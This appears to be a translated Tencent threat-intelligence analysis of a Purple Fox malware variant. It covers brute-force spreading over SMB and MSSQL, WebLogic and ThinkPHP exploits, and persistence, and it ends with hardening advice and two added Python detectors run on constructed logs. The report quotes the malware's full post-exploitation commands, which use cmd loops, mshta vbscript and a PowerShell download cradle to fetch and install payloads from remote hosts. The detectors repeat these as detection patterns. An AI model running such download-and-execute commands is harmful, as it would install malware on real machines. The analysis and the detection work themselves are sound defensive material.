The Purple Fox virus has been upgraded again, spreading through weak-password brute-force attacks and server vulnerability exploits
The Tencent Security Threat Intelligence Center has detected the latest variant of the "Purple Fox" virus. It spreads through SMB and MSSQL weak-password brute-force attacks and also exploits remote code execution vulnerabilities in server components such as WebLogic and ThinkPHP, which once again strengthens the family's ability to spread. The family ultimately profits by controlling large numbers of compromised machines ("broilers", i.e. bots) and pushing the installation of software that users do not need.
The Purple Fox family first appeared in 2018, initially spreading through Trojan downloaders, and has been active ever since. It later spread through traffic-boosting ("brushing") software (for details, see: the "Traffic Bao Flow Edition" brushing software disclosed by the Yujian Threat Intelligence Center in September, which spread the Purple Fox virus through a drive-by (hanging-Trojan) attack). The new variant uses the PendingFileRenameOperations mechanism to replace system files so that it starts at boot, drops and installs a driver to protect the Trojan, and has strong persistence capabilities.
The recent attack trends of the Purple Fox virus are as follows:
2. Sample Analysis
The sample downloaded from http://184.108.40.206:17941/0E2335FDC174DB4EBECF77184CBF8706.moe (md5: 372c265d58089533dae5b42c2e94078b) is actually an MSI installation package. The Trojan MSI package contains 3 files: one non-PE file (an encrypted PE file) and two Trojan DLLs, a 32-bit and a 64-bit build. The virus still uses the system's PendingFileRenameOperations mechanism to replace system files in order to start at boot.
After the MSI is installed, the system prompts the user to restart the computer.
After the restart, the file C:\Windows\AppPatch\Ke971119.xsl is dropped and decrypted into the Trojan DLL C:\Windows\System32\Ms6E6AA944App.dll.
It then attempts to install the Trojan DLL as a service by writing to the registry.
Ms6E6AA944App.dll decrypts a driver and installs a system callback (Cmpcallback).
The driver installs a file-system filter to protect the Trojan's files.
Shellcode is injected into svchost.exe, which scans random IP addresses in the machine's own network segment for open ports 445 and 1433 and then launches SMB and MSSQL brute-force attacks against the hosts with those ports open.
The brute-forcing uses a built-in IP list; the password dictionary is as follows:
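The scanning and brute-forcing behaviour described above leaves a characteristic trace on the victims: one source address producing a burst of SMB or MSSQL logon failures across several account names, sometimes followed by a success once a weak password is found. The following added example (not code from the original article or from Tencent) is a small sliding-window detector over constructed authentication log lines; the log format, addresses (10.0.5.x) and account names are assumptions made for the example.

```python
from collections import defaultdict, deque
from dataclasses import dataclass
from datetime import datetime, timedelta

@dataclass(frozen=True)
class AuthEvent:
    ts: datetime
    src_ip: str
    service: str   # "smb" or "mssql"
    user: str
    success: bool

@dataclass(frozen=True)
class Alert:
    src_ip: str
    service: str
    kind: str      # "bruteforce_burst" or "credential_guessed"
    count: int     # failures from this source still inside the window

def _constructed_log() -> list:
    """Constructed sample log lines: 'ISO-time src service user FAIL|OK'.
    These are synthetic, not telemetry from any real Purple Fox incident."""
    base = datetime(2019, 10, 21, 2, 0, 0)
    users = ["administrator", "admin", "sa", "guest"]
    out = []
    # Scanning host: 12 SMB failures in ~22 s over rotating users, then a success
    for i in range(12):
        out.append(f"{(base + timedelta(seconds=2 * i)).isoformat()} 10.0.5.23 smb {users[i % 4]} FAIL")
    out.append(f"{(base + timedelta(seconds=26)).isoformat()} 10.0.5.23 smb administrator OK")
    # Same host against MSSQL: 15 'sa' failures in 15 s, no success
    for i in range(15):
        out.append(f"{(base + timedelta(seconds=40 + i)).isoformat()} 10.0.5.23 mssql sa FAIL")
    # Benign user: 4 typos spread over 45 minutes, then logs in normally
    for i in range(4):
        out.append(f"{(base + timedelta(minutes=15 * i)).isoformat()} 10.0.5.80 smb jsmith FAIL")
    out.append(f"{(base + timedelta(minutes=46)).isoformat()} 10.0.5.80 smb jsmith OK")
    return out

SAMPLE_LOG = _constructed_log()

def parse_auth_line(line: str) -> AuthEvent:
    ts, src, service, user, result = line.split()
    return AuthEvent(datetime.fromisoformat(ts), src, service, user, result == "OK")

def parse_auth_log(lines) -> list:
    return [parse_auth_line(l) for l in lines if l.strip()]

def detect_bruteforce(events, threshold: int = 10, window: timedelta = timedelta(seconds=60)) -> list:
    """Alert once per (source, service) when `threshold` failures fall inside
    `window`, and again if that source later authenticates successfully."""
    recent = defaultdict(deque)   # (src, service) -> deque of failure timestamps
    alerted = set()
    alerts = []
    for ev in sorted(events, key=lambda e: e.ts):
        key = (ev.src_ip, ev.service)
        failures = recent[key]
        if ev.success:
            # A success from a source already flagged means a password was guessed
            if key in alerted:
                alerts.append(Alert(ev.src_ip, ev.service, "credential_guessed", len(failures)))
            continue
        failures.append(ev.ts)
        while failures and ev.ts - failures[0] > window:
            failures.popleft()   # drop failures that aged out of the window
        if len(failures) >= threshold and key not in alerted:
            alerted.add(key)
            alerts.append(Alert(ev.src_ip, ev.service, "bruteforce_burst", len(failures)))
    return alerts

if __name__ == "__main__":
    for a in detect_bruteforce(parse_auth_log(SAMPLE_LOG)):
        print(a)
```

The benign user's scattered failures never reach the threshold inside one window, so only the scanning host is flagged; the second alert kind is the one worth paging on, because it marks the point at which the attack in this article moves from brute-forcing to running smbexec or xp_cmdshell-style commands on the victim.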
After SMB brute-forcing succeeds, smbexec is used to execute the command:
Cmd /c for /d %i in (220.127.116.11:10668 18.104.22.168:17941 22.214.171.124:17022) do Msiexec /i http ://%i/72AFD4AB0CB8B0453C3E90E7903D9315.moe /Q
After MSSQL brute-forcing succeeds, a shell command is executed through "cmdexec":
"C:/Windows/system32/cmd.exe" /c mshta vbscript:createobject( "wscript.shell").run("Cmd /c for /d %i in (126.96.36.199:12900 188.8.131.52:13446 184.108.40.206:17941) do Msiexec /i http://%i/61BF1E594ABE3B46B111B1A3C82CAFEA.moe /Q",0)(window.close)
During MSSQL brute-forcing it also runs Sqlexec through PowerShell and passes the command to execute as the ExeArgs parameter:
C:/Windows/System32/WindowsPowerShell /v1.0/powershell.exe -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString(http://rawcdn.githack.com/28308/256/388472586c8aed167752f6174e7de42660b68551/Sqlexec/pe.jpg); Invoke-ReflectivePEInjection -PEUrl http://rawcdn.githack.com/28308/256/388472586c8aed167752f6174e7de42660b68551/Sqlexec/1505164.jpg -ExeArgs /Cmd /c for /d %i in (220.127.116.111 167.248) .105.30:18745) do Msiexec /i http://%i/61BF1E594ABE3B46B111B1A3C82CAFEA.moe
It also writes a 1.hta script file to the global Startup folder to download the Trojan.
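The three post-exploitation commands quoted above share a handful of traits that are rare in legitimate administration: msiexec installing from an HTTP URL with /Q, a cmd "for /d" loop feeding addresses to msiexec, mshta executing inline vbscript, and a PowerShell download cradle (-nop -exec bypass ... IEX ... DownloadString), all spawned under cmd.exe or the MSSQL service process. The following added example (not code from the original article or from Tencent) applies those checks to constructed process-creation records; the record format, host names, the 192.0.2.10 address and the EXAMPLE.moe file name are assumptions made for the example.

```python
import re
from dataclasses import dataclass

@dataclass(frozen=True)
class ProcessEvent:
    host: str
    parent: str
    image: str
    cmdline: str

@dataclass(frozen=True)
class Finding:
    host: str
    image: str
    rule: str

# Constructed sample records in a simplified "host | parent | image | command line"
# form (Sysmon Event ID 1 style). The addresses and file names are placeholders.
SAMPLE_EVENTS = [
    "srv01 | services.exe | svchost.exe | C:\\Windows\\system32\\svchost.exe -k netsvcs",
    "srv01 | cmd.exe | msiexec.exe | Msiexec /i http://192.0.2.10:17941/EXAMPLE.moe /Q",
    "srv02 | sqlservr.exe | cmd.exe | \"C:/Windows/system32/cmd.exe\" /c mshta vbscript:createobject(\"wscript.shell\").run(\"Cmd /c for /d %i in (192.0.2.10:17941) do Msiexec /i http://%i/EXAMPLE.moe /Q\",0)(window.close)",
    "srv02 | sqlservr.exe | powershell.exe | powershell.exe -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString(http://example.invalid/pe.jpg)",
    "wks07 | explorer.exe | msiexec.exe | msiexec /i C:\\Users\\alice\\Downloads\\7zip.msi /qn",
]

_RE_MSIEXEC_URL = re.compile(r"\bmsiexec(?:\.exe)?\s+/i\s+https?://", re.I)
_RE_FOR_LOOP_MSIEXEC = re.compile(r"\bfor\s+/d\s+%i\s+in\s*\(.*?\)\s*do\s+msiexec", re.I)
_RE_MSHTA_VBSCRIPT = re.compile(r"\bmshta\s+vbscript:", re.I)
_SHELL_IMAGES = {"cmd.exe", "powershell.exe", "mshta.exe"}

def parse_event(line: str) -> ProcessEvent:
    host, parent, image, cmdline = (part.strip() for part in line.split("|", 3))
    return ProcessEvent(host, parent, image, cmdline)

def _is_download_cradle(cmd: str) -> bool:
    low = cmd.lower()
    return ("powershell" in low and ("-nop" in low or "-noprofile" in low)
            and "bypass" in low and "iex" in low and "downloadstring" in low)

def evaluate(ev: ProcessEvent) -> list:
    """Return the names of every rule the event matches (possibly several)."""
    hits = []
    if _RE_MSIEXEC_URL.search(ev.cmdline):
        hits.append("msiexec_remote_url")
    if _RE_FOR_LOOP_MSIEXEC.search(ev.cmdline):
        hits.append("for_loop_msiexec")
    if _RE_MSHTA_VBSCRIPT.search(ev.cmdline):
        hits.append("mshta_vbscript_inline")
    if _is_download_cradle(ev.cmdline):
        hits.append("powershell_download_cradle")
    # The MSSQL service process itself spawning a shell is the cmdexec/xp_cmdshell path
    if ev.parent.lower() == "sqlservr.exe" and ev.image.lower() in _SHELL_IMAGES:
        hits.append("mssql_spawned_shell")
    return hits

def scan_events(lines) -> list:
    findings = []
    for line in lines:
        ev = parse_event(line)
        for rule in evaluate(ev):
            findings.append(Finding(ev.host, ev.image, rule))
    return findings

if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS):
        print(f)
```

The local MSI install on wks07 matches nothing, which is the point of keying the msiexec rule on an http(s) source rather than on msiexec itself; the remaining rules each correspond to one of the command lines the article quotes and can be mapped onto the same logic in a SIEM query.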
Analysis also found that the Purple Fox virus exploits the WebLogic deserialization remote code execution vulnerability (CNVD-C-2019-48814, CVE-2019-2725). Because of flaws in how input is deserialized, an unauthenticated attacker can send a specially crafted malicious HTTP request to gain control of the server and achieve remote code execution. The affected versions are Oracle WebLogic Server 10. .* and Oracle WebLogic Server 12.1.3.
It also exploits the ThinkPHP high-risk vulnerability (CNVD-2018-24942). The vulnerability stems from the route/dispatch module in the PHP code not filtering malicious commands in the URL; when forced routing is not enabled, this allows remote command execution, including running shell commands, calling PHP functions, writing webshells, and so on. The main affected versions are 5.x.
3. Security Recommendations
1. Enterprises should close network ports on servers that do not need to be open (such as 135, 139 and 445); for the method, refer to: https://guanjia.qq.com/web_clinic/s8/585.html;
2. Enterprise intranets should enforce a password policy that requires strong passwords; do not use weak passwords, and do not reuse one password across multiple servers, to prevent brute-force cracking;
3. Harden servers regularly, patch security vulnerabilities in enterprise server components as soon as possible, and fix vulnerabilities promptly.
IOCs